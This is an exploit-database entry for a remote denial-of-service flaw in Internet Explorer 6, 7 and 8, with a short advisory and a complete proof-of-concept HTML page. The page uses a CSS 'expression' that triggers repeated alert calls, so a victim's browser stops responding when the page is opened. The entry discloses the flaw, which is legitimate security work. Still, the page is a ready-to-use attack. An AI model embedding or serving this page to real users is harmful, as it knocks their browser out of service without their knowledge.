Microsoft Internet Explorer 8 - CSS 'expression' Remote Denial of Service

Author: MustLive
type: dos
platform: windows
port: 
date_added: 2010-01-01  
date_updated: 2014-07-15  
verified: 1  
codes:   
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 34069.html  

source: https://www.securityfocus.com/bid/40487/info

Microsoft Internet Explorer is prone to a remote denial-of-service vulnerability.

Attackers can exploit this issue by enticing an unsuspecting user to view a specially crafted webpage.

Successfully exploiting this issue will cause the application to stop responding, denying service to legitimate users.

Internet Explorer 6, 7, and 8 are vulnerable.

<html> <head> <title>Internet Explorer DoS Exploit (C) 2008 MustLive. http://websecurity.com.ua</title> </head> <body> <p style="dos:expression(alert('DoS'))">IE DoS</p> </body> </html>